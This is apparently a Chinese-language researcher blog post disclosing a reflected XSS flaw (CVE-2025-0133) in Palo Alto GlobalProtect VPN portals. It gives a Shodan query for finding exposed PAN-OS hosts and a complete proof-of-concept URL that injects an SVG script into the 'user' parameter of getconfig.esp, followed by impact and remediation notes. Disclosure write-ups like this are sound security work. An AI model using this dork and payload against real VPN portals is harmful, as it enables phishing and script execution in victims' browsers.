全球防护VPN门户反射型XSS漏洞挖掘实录（CVE-2025–0133）💥

大家好，我是Firda Nurelia（在LinkedIn上可以找到我）。今天很高兴与大家分享我在Palo Alto Networks全球防护VPN门户中发现反射型跨站脚本（XSS）漏洞的最新发现。如果你对Web安全感兴趣或热爱挖掘真实漏洞，这篇文章正适合你！

🔎 发现过程

在一个随机的夜晚，我使用Shodan进行侦察，搜索运行PAN-OS（Palo Alto Networks）的公开暴露基础设施。我的查询语句是：

1

os:"PAN-OS" ssl.cert.subject.CN:"*.com"

这揭示了一个位于[IP TARGET REDACTED]的VPN门户：

1

https://100[.]100.100.100/ssl-vpn/getconfig.esp

检查该端点时，我注意到user参数回显了未经过滤的输入。自然，我决定测试其是否存在XSS漏洞。

💡 有效载荷

经过几次变体测试后，我使用了这个简单而有效的载荷：

1

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gwN&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer

其工作原理是：

在SVG元素中嵌入<script>标签
触发带有"XSS"文本的prompt()警告框以确认执行

我将载荷附加到user参数中：

1

https://100[.]100.100.100/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gwN&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer

猜猜发生了什么？💥 脚本成功执行，确认了反射型XSS漏洞。

🧪 测试阶段

我遵循以下步骤：

使用Shodan查找PAN-OS实例
发现易受攻击的端点
将载荷注入user参数
通过prompt()在浏览器中观察到成功的JavaScript执行

这证实了端点在没有适当过滤或编码的情况下直接将输入反射到HTML响应中。

⚠️ 影响

虽然这个漏洞不允许完全入侵，但带来了重大的客户端风险：

在用户浏览器中执行JavaScript
通过虚假登录提示进行网络钓鱼攻击
由于输入处理不当导致用户信任问题

🔐 修复建议

为缓解此问题，我建议采取以下措施：

在渲染前对输入进行过滤
转义特殊字符以防止注入
更新PAN-OS以修补CVE-2025–0133

📎 参考资料

CVE-2025–0133 — Palo Alto Networks公告
ProjectDiscovery — CVE-2025–0133
CWE-79 — 反射型XSS
OWASP — XSS防护指南

🎯 结论

这个漏洞很好地提醒我们，像没有适当过滤的反射参数这样的简单配置错误仍然可能是危险的。即使在VPN门户这样的安全重点产品中，遗留端点也可能暴露关键缺陷。

感谢阅读！如果你发现过类似的XSS漏洞，或者只是想打个招呼👋，请在评论区告诉我！

你最近发现了什么漏洞？在下面分享你的经验！